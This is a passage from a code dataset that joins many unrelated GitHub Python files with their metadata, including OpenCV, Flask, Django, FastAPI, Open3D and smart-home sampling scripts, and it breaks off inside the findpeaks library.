sys22.I:(ureg.kilogram*ureg.meter*ureg.meter),\n sys22.phi:ureg.radian,\n sys22.z:ureg.meter,\n sys22.z.diff(t,t):ureg.meter/ureg.second**2,\n sys22.z_lw:ureg.meter,\n sys22.z_pw:ureg.meter,\n sys22.z_b:ureg.meter,\n t:ureg.second,\n f:ureg.hertz,\n sys22.k_p_zas:(ureg.newton / ureg.meter),\n sys22.k_l_zas:(ureg.newton / ureg.meter),\n sys22.c_l_zas:(ureg.newton*ureg.second / ureg.meter),\n sys22.c_p_zas:(ureg.newton*ureg.second / ureg.meter),\n }\n\nunit2=units_dict2\n \n\n","repo_name":"bogumilchilinski/dynpy","sub_path":"models/mechanics/chair.py","file_name":"chair.py","file_ext":"py","file_size_in_byte":41680,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"41100007638","text":"import cv2\nimport numpy as np\n\nimg = np.zeros((512, 512, 3), np.uint8)\n# print(img.shape)\nimg[:] = 255, 25, 255 # whole img coloring ..parition-->200:300:300:200\n\n# 1 width & 2 height..Last params is thickness\ncv2.line(img, (0, 0), (img.shape[1], img.shape[0]), (0, 255, 0), 3)\ncv2.rectangle(img, (0, 0), (250, 350), (0, 0, 255), 2) # Rectangle\n# center point,circle radius,colr scale,thickness\ncv2.circle(img, (200, 50), 30, (55, 55, 55), 2)\n# After \"OpenCV\"-> (widhth,height),font name,font size,color scale,thickness\ncv2.putText(img, \"OpenCV \", (300, 200),\n cv2.FONT_HERSHEY_COMPLEX, 1, (255, 100, 125), 2)\ncv2.imshow(\"Image\", img)\n\n\ncv2.waitKey(0)\n","repo_name":"subhamrex/Coding_Practice","sub_path":"Python/OpenCv_Python/chapter4.py","file_name":"chapter4.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14466516789","text":"from flask import Flask\nimport subprocess\n\nstate = 'stop'\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef main(direction):\n global state\n\n if direction in ['forward', 'left', 'right', 'stop']:\n print(f\"Processing {direction}\")\n if state != direction:\n subprocess.run([\"C:\\Program Files\\AutoHotkey\\AutoHotkey.exe\", f\"stop.ahk\"])\n state = direction\n subprocess.run([\"C:\\Program Files\\AutoHotkey\\AutoHotkey.exe\", f\"{direction}.ahk\"])\n\n return '', 204\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8098)","repo_name":"yurikaka/beam-server","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7092936266","text":"import pygame as pg\nimport random\nfrom config import *\n\nclass Platform(pg.sprite.Sprite):\n def __init__(self, x, y):\n super().__init__()\n self.image = pg.image.load(\"PlatformSprite.png\")\n self.surf = pg.Surface((85, 10))\n self.surf.fill(BLACK)\n self.rect = self.surf.get_rect(topleft=(x, y))\n self.rect.x = x\n self.rect.y = y\n self.vel = 0","repo_name":"wesdeal/Cathacks2023","sub_path":"Platform.py","file_name":"Platform.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23452859819","text":"from collections import Counter\nimport time\n\n\ndef solution1(participant, completion):\n s = time.time()\n part = Counter(participant)\n comp = Counter(completion)\n ans = part - comp\n # print(list(ans.keys())[0])\n print(f'{time.time() - s:.30f}')\n return list(ans.keys())[0]\n\n\ndef solution2(participant, completion):\n s = time.time()\n d = {}\n for x in participant:\n d[x] = d.get(x, 0) + 1\n for x in completion:\n d[x] -= 1\n dnf = [k for k, v in d.items() if v > 0]\n print(f'{time.time() - s:.30f}')\n return dnf[0]\n\n\nsolution1([\"mislav\", \"stanko\", \"mislav\", \"ana\"], [\"stanko\", \"ana\", \"mislav\"])\nsolution2([\"mislav\", \"stanko\", \"mislav\", \"ana\"], [\"stanko\", \"ana\", \"mislav\"])\n","repo_name":"yeoV/Algorithm","sub_path":"Programmers/LV_1/lv_1_완주하지못한선수.py","file_name":"lv_1_완주하지못한선수.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7019415881","text":"from django.conf.urls import url,include\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^index$', views.index, name='index'),\n url(r'^search$', views.search, name='search'),\n url(r'^addlocation$', views.addlocation, name='addlocation'),\n url(r'^addroom$', views.addroom, name='addroom'),\n url(r'^information', views.information, name='information'),\n url(r'^users$', views.users, name='users'),\n url(r'^vote$', views.vote, name='vote'),\n url(r'^autentication$',views.login, name='autentication'),\n url(r'^logout$',views.logout_view,name='logout'),\n url(r'^', include('django.contrib.auth.urls')),\n url(r'^register$', views.register_user, name='registration'),\n url(r'^register_success$', views.register_success, name='registration_success')\n]\n","repo_name":"Mez1092/TravelBook","sub_path":"myTravel/TravelBook/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14358682586","text":"\"\"\"\nrun with:\npython -mtimeit -s'import examples.speed_tests as st' 'st.use_rs()'\npython -mtimeit -s'import examples.speed_tests as st' 'st.use_py()'\n\"\"\"\nimport numpy as np\n\nimport ndarray_threaded_window as ntw\n\nnp.random.seed(19680801)\nwindow_len = 50\narray = array = np.random.randint(0, 255, (10000000, window_len), np.uint8)\n\n\ndef use_rs():\n ntw.apply_window(array, ntw.func_fast_population_std, [1, window_len])\n\n\ndef use_py():\n np.std(array, axis=1, dtype=np.float64)\n\n\nif __name__ == '__main__':\n print(\"this should not be run directly\")\n","repo_name":"Quiet-Clicking-Sounds/ndarray_threaded_window","sub_path":"examples/speed_tests.py","file_name":"speed_tests.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20454031682","text":"# Open3D: www.open3d.org\r\n# The MIT License (MIT)\r\n# See license file or visit www.open3d.org for details\r\n\r\n# importing required libraries\r\nimport json\r\nimport time, datetime\r\nimport sys\r\nsys.path.append(\"../Utility\")\r\nfrom file import check_folder_structure\r\nsys.path.append(\".\")\r\nfrom initialize_config import initialize_config\r\nimport os\r\n\r\n# for scene 1\r\nanalysis_folders = [\"..\\\\analysis_folder_scene_1\"]\r\n# for scene 2\r\n# analysis_folders = [\"analysis_folder_scene_2\"]\r\n\r\n\r\nis_make=input(\"Make fragments (y/n)? \")\r\nis_register=input(\"Register fragments (y/n)? \")\r\nis_refine=input(\"Refine fragments (y/n)? \")\r\nis_integrate=input(\"Integrate final scene (y/n)? \")\r\nconfig_folders=[folder+\"\\\\config\" for folder in analysis_folders]\r\nconfig_file_path_list=[]\r\nfor folder in config_folders:\r\n config_file_path_list.extend([folder+\"\\\\\"+file for file in os.listdir(folder)])\r\n\r\nfor config_file in config_file_path_list:\r\n with open(config_file) as json_file:\r\n config = json.load(json_file)\r\n initialize_config(config)\r\n check_folder_structure(config[\"path_dataset\"])\r\n assert config is not None\r\n\r\n config['debug_mode'] = False\r\n\r\n print(\"====================================\")\r\n print(\"Configuration\")\r\n print(\"====================================\")\r\n for key, val in config.items():\r\n print(\"%40s : %s\" % (key, str(val)))\r\n\r\n times = [0, 0, 0, 0]\r\n if is_make==\"y\":\r\n start_time = time.time()\r\n import make_fragments\r\n make_fragments.run(config)\r\n times[0] = time.time() - start_time\r\n if is_register==\"y\":\r\n start_time = time.time()\r\n import register_fragments\r\n register_fragments.run(config)\r\n times[1] = time.time() - start_time\r\n if is_refine==\"y\":\r\n start_time = time.time()\r\n import refine_registration\r\n refine_registration.run(config)\r\n times[2] = time.time() - start_time\r\n if is_integrate==\"y\":\r\n start_time = time.time()\r\n import integrate_scene\r\n integrate_scene.run(config)\r\n times[3] = time.time() - start_time\r\n\r\n print(\"====================================\")\r\n print(\"Elapsed time (in h:m:s)\")\r\n print(\"====================================\")\r\n print(\"- Making fragments %s\" % datetime.timedelta(seconds=times[0]))\r\n print(\"- Register fragments %s\" % datetime.timedelta(seconds=times[1]))\r\n print(\"- Refine registration %s\" % datetime.timedelta(seconds=times[2]))\r\n print(\"- Integrate frames %s\" % datetime.timedelta(seconds=times[3]))\r\n print(\"- Total %s\" % datetime.timedelta(seconds=sum(times)))\r\n sys.stdout.flush()","repo_name":"DanieleMarchisotti/virtual_benchmark_SLAM_3D","sub_path":"create_new_dataset/python/recon_3d_run.py","file_name":"recon_3d_run.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"69997243288","text":"from utils.config import read_kind, read_devices, read_devices_short, HOST, PORT, resp_time\nfrom utils.conversion import conversion\nfrom requests import get, put\nfrom time import sleep\nimport pandas as pd\nimport socket\nimport json\n\n\nclass icasa:\n def __init__(self):\n self.host = HOST\n self.port = PORT\n\n self.root = f'http://localhost:9000'\n\n self.get_devices_url = f'{self.root}/icasa/devices/devices'\n self.get_zones_url = f'{self.root}/icasa/zones/zones'\n self.get_persons_url = f'{self.root}/icasa/persons/persons'\n\n self.put_device_url = f'{self.root}/icasa/devices/device'\n self.put_zone_url = f'{self.root}/icasa/zones/zone'\n self.put_person_url = f'{self.root}/icasa/persons/person'\n\n self.speed_url = f'{self.root}/icasa/clocks/clock/default'\n self.restart_url = f'{self.root}/icasaRestart'\n\n self.read_kind =read_kind\n self.read_devices = read_devices\n self.read_devices_short = read_devices_short\n\n columns = [f'{k}' for k, v in self.read_devices_short.items()]\n columns.append('Pow')\n self.data = pd.DataFrame(columns={node: [] for node in columns}).astype(int)\n\n # Store sample in dataset\n def store(self):\n self.data.to_csv('dataset_online_sampling.csv', index=False, index_label=False, mode='a', header=False)\n\n # GET a new sample\n def sample(self):\n new_data = {}\n\n # Read sensor data\n resp_device = get(self.get_devices_url)\n if resp_device.status_code != 200:\n print(\"data loading fail!\")\n\n for device in resp_device.json():\n id = device['id']\n if id not in self.read_devices:\n print('Device not known!')\n continue\n for param in device['properties']:\n if param['name'] == self.read_devices[id]:\n new_data[[k for k, v in self.read_devices_short.items() if v == id][0]] = [param['value']]\n\n n_data = pd.DataFrame(new_data)\n\n # Manually adding Pow value since it is not a device\n # light = 100 if n_data['L'].bool() else 0\n # n_data['Pow'] = light + n_data['H'] * 1000 + n_data['C'] * 1000\n\n return n_data\n\n # The function actualizes the device values with a PUT request (works only if PUTs work)\n def intervention_by_API(self, evidence):\n for kind, (name, property), value in evidence:\n if kind == 'device':\n resp = put(self.put_device_url + f'/{name}' + f'/{property}',\n data=json.dumps(value))\n elif kind == 'zone':\n resp = put(self.put_zone_url + f'/{name}',\n data=json.dumps({property: value}))\n elif kind == 'person':\n resp = put(self.put_device_url + f'/{name}',\n data=json.dumps({'id': name, property: value}))\n else:\n assert False, 'not recognize option: kind'\n\n if resp.status_code != 200:\n print(\"pushing data fail!\", \"Error code: \", resp.status_code)\n\n print('Intervention [OK]')\n\n def format_evidence(self, evidence):\n return [(self.read_kind[name], (self.read_devices_short[name],\n self.read_devices[self.read_devices_short[name]]),\n value) for name, value in evidence.items()]\n\n def intervention_by_socket(self, evidence):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect((self.host, self.port))\n except:\n print(\"Connection to server refused!\")\n return\n\n # ev_str = str(evidence_to_numeric(evidence)) + \"\\n\"\n ev_str = str(evidence) + \"\\n\"\n ev_byte = str.encode(ev_str)\n sock.sendall(ev_byte)\n\n print('Intervention ok')\n\n def do(self, evidence, do_size=2, resp_time=resp_time):\n\n columns = [f'{k}' for k, v in self.read_devices_short.items()]\n # Append Pow column\n columns.append('Pow')\n\n # Initialize dataset\n df = pd.DataFrame(columns={node: [] for node in columns}).astype(int)\n\n if evidence is not None:\n # Format evidence: necessary only with intervention via API\n formatted = self.format_evidence(evidence)\n\n # Make intervention via socket or API (pay attention on format evidence)\n # self.intervention_by_socket(evidence)\n self.intervention_by_API(formatted)\n\n # Collect do_size samples\n for i in range(do_size):\n new_sample = self.sample()\n\n # Pow\n if evidence is not None:\n node = str(tuple(evidence.items())[0][0])\n if node == 'L':\n new_sample['Pow'] = 100 if new_sample['L'].bool() else 0\n elif node == 'H':\n # Giustificabile come al di sotto di una certa soglia il sensore non riesce a misurare la potenza\n new_sample['Pow'] = new_sample['H'] * 1000 if new_sample['H'].item() > 500 else 0\n elif node == 'C':\n new_sample['Pow'] = new_sample['C'] * 1000 if new_sample['C'].item() > 500 else 0\n else:\n new_sample['Pow'] = 0\n else:\n light = 100 if new_sample['L'].bool() else 0\n heater = new_sample['H'] * 1000 if new_sample['H'].item() > 500 else 0\n cooler = new_sample['Pow'] = new_sample['C'] * 1000 if new_sample['C'].item() > 500 else 0\n new_sample['Pow'] = light + heater + cooler\n\n df = pd.concat([df, conversion(new_sample)], axis=0)\n sleep(resp_time) if resp_time > 0 else None\n\n df.reset_index(drop=True, inplace=True)\n\n # Store data\n self.data = df\n self.store()\n\n return df\n\n # The function simulates the values without making a real intervention\n # def simulate(self, evidence, do_size=2):\n #\n # evidence = evidence_to_numeric(evidence)\n #\n # node = str(tuple(evidence.items())[0][0])\n # value = tuple(evidence.items())[0][1]\n #\n # df = pd.DataFrame(columns=['Pr', 'L', 'T', 'W', 'H', 'Pow']).astype(int)\n #\n # sample = {}\n # for i in range(do_size):\n #\n # # Simulate past values\n # if i == 0:\n # for n in df.columns:\n # if n == 'Pr':\n # sample['Pr'] = 0\n # elif n == 'L':\n # sample['L'] = 0\n # elif n == 'Pow':\n # sample['Pow'] = 500\n # elif n == 'H':\n # sample['H'] = 600\n # elif n == 'W':\n # sample['W'] = 0\n # elif n == 'T':\n # sample['T'] = 293.15\n #\n # # Intervention\n # sample[node] = value\n #\n # # Change values based on intervention\n # if node == 'L':\n # sample['Pow'] = sample['Pow'] * 2 if sample['L'] == 1 else sample['Pow'] // 2\n # elif node == 'H':\n # sample['Pow'] = sample['Pow'] * 2 if sample['H'] > 500 else sample['Pow'] // 2\n # sample['T'] = sample['T'] * 2 if sample['H'] > 500 else sample['T'] // 2\n # elif node == 'W':\n # sample['T'] = sample['T'] * 2 if sample['W'] == 0 else sample['T'] // 2\n #\n # # Add sample to dataset\n # df = df.append(pd.Series(sample, name=i))\n #\n # return conversion(df)\n\n\nif __name__ == '__main__':\n home = icasa()\n\n # TEST sample, status: working\n # ret = home.sample()\n # print(ret)\n\n # TEST intervention, status: working\n # evidence = ['BinaryLight-5022136575', 'binaryLight.powerStatus', 'true']\n # ret = home.intervention(evidence)\n # print(ret)\n\n # TEST do, status: working\n # evidence = {'O': 300.0}\n # ret = home.do(evidence)\n # print(ret)\n\n # TEST simulate, status: working\n # evidence = {'H': 1}\n # df = home.simulate(evidence, 10)\n # print(df)\n\n # In order to make sampling without intervention, we can call do method with a None evidence\n\n # TEST intervention\n # evidence = {'L': 0}\n #\n # home.do(evidence=None, do_size=2, resp_time=0)\n # home.intervention(evidence)\n # print(home.sample())\n # print(home.data)\n\n\n","repo_name":"pakyr/multiagent_algorithm","sub_path":"online.py","file_name":"online.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26536285772","text":"\r\nfrom pylab import *\r\nimport csv\r\n\r\ndef readData(filename):\r\n\t\"\"\"Read in samples of a training represented one per line,\"\"\" \r\n\tprint(\"Loading Data: \" + filename) \r\n\tsamples = []\r\n\r\n\twith open(filename,'r') as testfile:\r\n\t\tcsv_reader = csv.reader(testfile)\r\n\t\tskip = True\r\n\t\tfor line in csv_reader:\r\n\t\t\tif(skip):\r\n\t\t\t\tskip = False\r\n\t\t\t\tcontinue\r\n\t\t\tsamples.append([float(line[0]),float(line[1]),float(line[2])])\r\n\r\n\tprint(\" completed.\\n\")\r\n\treturn samples\r\n\r\n\r\ndef plotSamples( samples,title):\t\r\n\t'''\r\n\treceives statices and creates a plot\r\n\t'''\r\n\tx = [i for i in range(0,len(samples))]\r\n\tyTarget = [s[1] for s in samples]\r\n\tyOutput = [s[2] for s in samples]\r\n\tline, = plt.plot(x, yTarget, lw=1, label=\"Target\")\r\n\tline, = plt.plot(x, yOutput, lw=1, label=\"Output\")\r\n\tplt.legend()\r\n\tplt.title(\" {}\".format(title) )\r\n\t# plt.savefig(\"{} \".format(title))\r\n\tplt.show()\r\n\treturn plt\r\n\r\ndef main():\r\n\tfor i in range(1,11):\r\n\t\tsamples = readData(\"../Results/stock_{}_days_test_score_idents.csv\".format(i))\r\n\t\tplotSamples(samples,i)\r\n\tfor i in range(1,11):\r\n\t\tsamples = readData(\"../Results/stock2_{}_days_test_score_idents.csv\".format(i))\r\n\t\tplotSamples(samples,i+10)\r\n\r\n\r\nif __name__==\"__main__\":\r\n\tmain()","repo_name":"nc3816/predict_stock_value_bigDataProject","sub_path":"Scripts/plotResults.py","file_name":"plotResults.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6855871860","text":"from bookClass import Book\nimport csv\nimport os\nimport pickle\n\nfilename = \"details.csv\"\n\n# reading csv file\nwith open(filename, 'r') as csvfile:\n # creating a csv reader object\n csvreader = csv.reader(csvfile)\n rows = []\n # extracting each data row one by one\n for row in csvreader:\n rows.append(row)\nBooks = []\nindex = 0\nfor row in rows:\n print(index)\n oneBook = Book()\n oneBook.set_index(row[0])\n oneBook.set_title(row[1])\n oneBook.set_author(row[2])\n oneBook.set_description(row[3])\n oneBook.set_rating(row[4])\n oneBook.set_genre(row[5])\n oneBook.set_chars(row[6])\n oneBook.set_awards(row[7])\n oneBook.set_all_text(row[8])\n Books.append(oneBook)\n index = index + 1\npickle_out = open(os.getcwd() + \"/book_info.pickle\",\"wb\")\npickle.dump(Books, pickle_out)\npickle_out.close()\n","repo_name":"kaushikn97/Libro","sub_path":"csv_to_pickle.py","file_name":"csv_to_pickle.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25822335475","text":"# -*- coding: utf-8 -*-\n# XXX Migrate to YAML\n\nimport geom\nfrom materials.ehe import EHE_materials\n\ndef define_section(preprocessor, leverArm, barDiam, barArea):\n barsSectionGeometry= preprocessor.getMaterialHandler.newSectionGeometry(\"barsSectionGeometry\")\n reinforcement= barsSectionGeometry.getReinfLayers\n reinforcementInf= reinforcement.newStraightReinfLayer(EHE_materials.B500S.nmbDiagD)\n reinforcementInf.numReinfBars= 2\n reinforcementInf.barDiam= barDiam\n reinforcementInf.barArea= barArea\n reinforcementInf.p1= geom.Pos2d(-leverArm,leverArm) # bottom layer.\n reinforcementInf.p2= geom.Pos2d(-leverArm,-leverArm)\n reinforcementSup= reinforcement.newStraightReinfLayer(EHE_materials.B500S.nmbDiagD)\n reinforcementSup.numReinfBars= 2\n reinforcementSup.barDiam= barDiam\n reinforcementSup.barArea= barArea\n reinforcementSup.p1= geom.Pos2d(leverArm,leverArm) # top layer.\n reinforcementSup.p2= geom.Pos2d(leverArm,-leverArm)\n return barsSectionGeometry, reinforcementInf, reinforcementSup\n","repo_name":"xcfem/xc","sub_path":"verif/tests/aux/barsSectionGeometry.py","file_name":"barsSectionGeometry.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"34080132534","text":"# FastAPI를 통해 구현한 기능들은 모두 서버주소/redoc, 서버주소/docs 주소로 api문서를 자동 생성 해준다\n\nfrom tkinter import PhotoImage\nfrom unicodedata import name\nfrom fastapi import FastAPI\napp = FastAPI()\n\nfrom fastapi.responses import FileResponse # html등의 파일을 경로에 접속했을때 보여줄수 있는 모듈\n\n@app.get(\"/\") # '/'는 메인페이지를 뜻함.\ndef main_server():\n return 'hello' # 메인 페이지에 접속했을때 보여지는 정보\n\n@app.get(\"/data\")\ndef data_page(): \n return FileResponse('index.html') # 위에서 import한 모듈 사용 FileResponse('파일경로') 파일 경로를 작성해주면 유저가 특정 주소에 접속하였을때\n # 파일을 전송해줄 수 있다.\n\n'''\n유저로부터 특정 데이터를 입력받으려면? (이름, 이메일, 아이디 등)\n'''\n\nfrom pydantic import BaseModel\n# DB 입출력의 경우 이 위치에 데이터베이스 접속코드 작성\n\nclass rec_type(BaseModel): # 유저가 발신할 데이터 모델 생성. 모델을 생성할때는 클래스 명(BaseModel)을 사용 \n name : str # \"데이터의 이름 : 타입\"형식으로 작성 ex) 이름의 경우에는 문자열이므로 name : str\n phone : int\n\n@app.post(\"/send\") # 유저로부터 데이터를 수신 받으려면 @app.post를 사용, 예를 들어 app.post(\"/send\")라면 send라는 url로 정보를 보내는 방식\ndef post_page(data : rec_type): # 보낸 데이터를 담아줄 \n print(data) # 유저가 전송한 데이터 출력\n # DB입출력의 경우 이 위치에 코드 작성(DB 입,출력)\n return '전송 완료 '\n\n@app.get(\"/test\")\nasync def async_page(): # def 앞부분에 async를 입력하면\n await print(\"await\") # await를 사용 가능하게 된다. await란? 비동기처리기능 쉽게 말해, await 뒤에 사용한 코드의 처리가 오랜 시간이 걸리게 되면\n # await 이후의 코드를 먼저 실행한다. 이 기능 덕분에 django, flask 등 프레임워크보다 빠른 처리가 가능\n return 'haha'","repo_name":"chaewu/TIL","sub_path":"FastAPI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34456619637","text":"#!/usr/bin/env python\n\nimport wget\nimport os\nimport ROOT\n\n# Download ROOT file with toy calorimeter data\nfilename = \"testDataReg.root\"\nif not os.path.exists(filename):\n wget.download(\"https://www.hep1.physik.uni-bonn.de/people/homepages/tmva/testDataReg.root\")\n\n# Read out events and write to CSV file\noutput_file = open(\"toy_calorimeter.csv\", \"w\")\nfor i in range(13):\n output_file.write(\"e{} \".format(i))\noutput_file.write(\"etruth\\n\")\n\nfile_ = ROOT.TFile(filename)\ntree = file_.Get(\"TreeR\")\nfor event in tree:\n for i in range(13):\n output_file.write(\"{} \".format(getattr(event, \"e{}\".format(i))))\n output_file.write(\"{}\\n\".format(getattr(event, \"etruth\".format(i))))\n","repo_name":"stwunsch/fermilab_keras_workshop","sub_path":"utils/preprocess_calorimeter_data.py","file_name":"preprocess_calorimeter_data.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"71221763609","text":"\"\"\"Python library for the detection of peaks and valleys.\"\"\"\n# ----------------------------------------------------\n# Name : findpeaks.py\n# Author : E.Taskesen\n# Contact : erdogant@gmail.com\n# github : https://github.com/erdogant/findpeaks\n# Licence : See LICENSE\n# ----------------------------------------------------\n\n# import findpeaks\nfrom peakdetect import peakdetect\nfrom caerus import caerus\nimport caerus.utils.csplots as csplots\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport os\nimport requests\nfrom urllib.parse import urlparse\n\n# #### DEBUG ONLY ####\n# import stats as stats\n# from stats import disable_tqdm\n# import interpolate as interpolate\n# #####################\nimport findpeaks.stats as stats\nfrom findpeaks.stats import disable_tqdm\nimport findpeaks.interpolate as interpolate\n# #####################\n\n\n# %%\nclass findpeaks():\n \"\"\"Python library for the detection of peaks and valleys.\n\n findpeaks is for the detection and vizualization of peaks and valleys in a 1D-vector and 2D-array.\n In case of 2D-array, the image can be pre-processed by resizing, scaling, and denoising. For a 1D-vector,\n pre-processing by interpolation is possible. Peaks can be detected using various methods, and the results can be\n vizualized, such as the preprocessing steps, the persistence of peaks, the masking plot and a 3d-mesh plot.\n\n Examples\n --------\n >>> from findpeaks import findpeaks\n >>> X = [9,60,377,985,1153,672,501,1068,1110,574,135,23,3,47,252,812,1182,741,263,33]\n >>> fp = findpeaks(method='peakdetect', interpolate=10, lookahead=1)\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # 2D array example\n >>> from findpeaks import findpeaks\n >>> X = fp.import_example('2dpeaks')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Image example\n >>> from findpeaks import findpeaks\n >>> fp = findpeaks(method='topology', denoise='fastnl', params={'window': 30}, imsize=(300,300))\n >>> X = fp.import_example('2dpeaks_image')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Plot each seperately\n >>> fp.plot_preprocessing()\n >>> fp.plot_persistence()\n >>> fp.plot_mesh()\n\n References\n ----------\n * https://erdogant.github.io/findpeaks/\n\n \"\"\"\n\n def __init__(self,\n method=None,\n whitelist=['peak', 'valley'],\n lookahead=200,\n interpolate=None,\n limit=None,\n imsize=None,\n scale=True,\n togray=True,\n denoise='fastnl',\n window=None, # DEPRECATED IN LATER VERSIONS: specify in params\n cu=None, # DEPRECATED IN LATER VERSIONS: specify in params\n params_caerus={}, # DEPRECATED IN LATER VERSIONS: use params instead\n params={'window': 3, 'delta': 0},\n figsize=(15, 8),\n verbose=3):\n \"\"\"Initialize findpeaks parameters.\n\n Parameters\n ----------\n X : array-like (1d-vector or 2d-image)\n Input image data.\n method : String, (default : None).\n Available methods for peak detection. In case method=None, the default is choosen.\n 1d-vector approaches:\n * 'topology'\n * 'peakdetect' (default)\n * 'caerus'\n 2d-array approaches:\n * 'topology' (default)\n * 'mask'\n whitelist : str or list ['peak','valley']\n Choose what to detect:\n * 'peak'\n * 'valley'\n * ['peak','valley']\n lookahead : int, (default : 200)\n Looking ahead for peaks. For very small 1d arrays (such as up to 50 datapoints), use low numbers such as 1 or 2.\n interpolate : int, (default : None)\n Interpolation factor. The higher the number, the less sharp the edges will be.\n limit : float, (default : None)\n In case method='topology'\n Values > limit are active search areas to detect regions of interest (ROI).\n imsize : tuple, (default : None)\n resize to (width,length).\n scale : bool, (default : False)\n Scaling in range [0-255] by img*(255/max(img))\n denoise : string, (default : 'fastnl', None to disable)\n Filtering method to remove noise:\n * None\n * 'fastnl'\n * 'bilateral'\n * 'lee'\n * 'lee_enhanced'\n * 'lee_sigma'\n * 'kuan'\n * 'frost'\n * 'median'\n * 'mean'\n params : dict():\n Denoising parameters for the methods. If None are defined, the default will be used:\n * caerus (default): {'window': 50, 'minperc': 3, 'nlargest': 10, 'threshold': 0.25}\n * lee_sigma (default): {'window': 7, 'sigma': 0.9, 'num_looks': 1, 'tk': 5}\n * 'sigma': float, (default: 0.9): Speckle noise standard deviation, applies for methods: ['lee_sigma']\n * 'num_looks': int, (default: 1): Number of looks of the SAR img, applies for methods: ['lee_sigma']\n * 'tk': int, (default: 5): Threshold of neighbouring pixels outside of the 98th percentile, applies for methods: ['lee_sigma']\n * cu : float, (default: 0.25): The noise variation coefficient, applies for methods: ['kuan','lee','lee_enhanced']\n * window : int, (default : 3): Denoising window. Increasing the window size may removes noise better but may also removes details of image in certain denoising methods.\n * peakdetect\n 'delta' : int (default: 0): this specifies a minimum difference between a peak and the following points, before a peak may be considered a peak. Useful to hinder the function\n from picking up false peaks towards to end of the signal. To work well delta should be set to delta >= RMSnoise * 5.\n When omitted delta function causes a 20% decrease in speed. When used Correctly it can double the speed of the function\n togray : bool, (default : False)\n Conversion to gray scale.\n verbose : int (default : 3)\n Print to screen. 0: None, 1: Error, 2: Warning, 3: Info, 4: Debug, 5: Trace.\n\n Returns\n -------\n dict()\n See 1dpeaks and 2dpeaks for more details.\n\n Examples\n --------\n >>> from findpeaks import findpeaks\n >>> X = [9,60,377,985,1153,672,501,1068,1110,574,135,23,3,47,252,812,1182,741,263,33]\n >>> fp = findpeaks(method='peakdetect', interpolate=10, lookahead=1)\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # 2D array example\n >>> from findpeaks import findpeaks\n >>> X = fp.import_example('2dpeaks')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Image example\n >>> from findpeaks import findpeaks\n >>> fp = findpeaks(method='topology', denoise='fastnl', params={'window': 30}, imsize=(300,300))\n >>> X = fp.import_example('2dpeaks_image')\n >>> results = fp.fit(X)\n >>> fp.plot()\n >>>\n >>> # Plot each seperately\n >>> fp.plot_preprocessing()\n >>> fp.plot_persistence()\n >>> fp.plot_mesh()\n\n References\n ----------\n * https://erdogant.github.io/findpeaks/\n \"\"\"\n if window is not None: print('The input parameter \"window\" will be deprecated in future releases. Please use \"params={\"window\": 5}\" instead.')\n if cu is not None: print('The input parameter \"cu\" will be deprecated in future releases. Please use \"params={\"cu\": 3}\" instead.')\n\n # Store in object\n if isinstance(whitelist, str): whitelist=[whitelist]\n if lookahead is None: lookahead=1\n lookahead = np.maximum(1, lookahead)\n # if method is None: raise Exception('[findpeaks] >Specify the desired method=\"topology\", \"peakdetect\", or \"mask\".')\n self.method = method\n self.whitelist = whitelist\n self.lookahead = lookahead\n self.interpolate = interpolate\n self.limit = limit\n self.imsize = imsize\n self.scale = scale\n self.togray = togray\n self.denoise = denoise\n self.figsize = figsize\n self.verbose = verbose\n\n # Store parameters for caerus\n defaults={}\n if method=='caerus':\n if len(params_caerus)>0:\n print('The input parameter \"params_caerus\" will be deprecated in future releases. Please use \"params\" instead.')\n params = params_caerus\n defaults = {'window': 50, 'minperc': 3, 'nlargest': 10, 'threshold': 0.25}\n elif method=='lee_sigma':\n defaults = {'window': 7, 'sigma': 0.9, 'num_looks': 1, 'tk': 5}\n elif method=='peakdetect':\n defaults = {'delta': 0}\n defaults = {**{'window': 3}, **defaults}\n\n 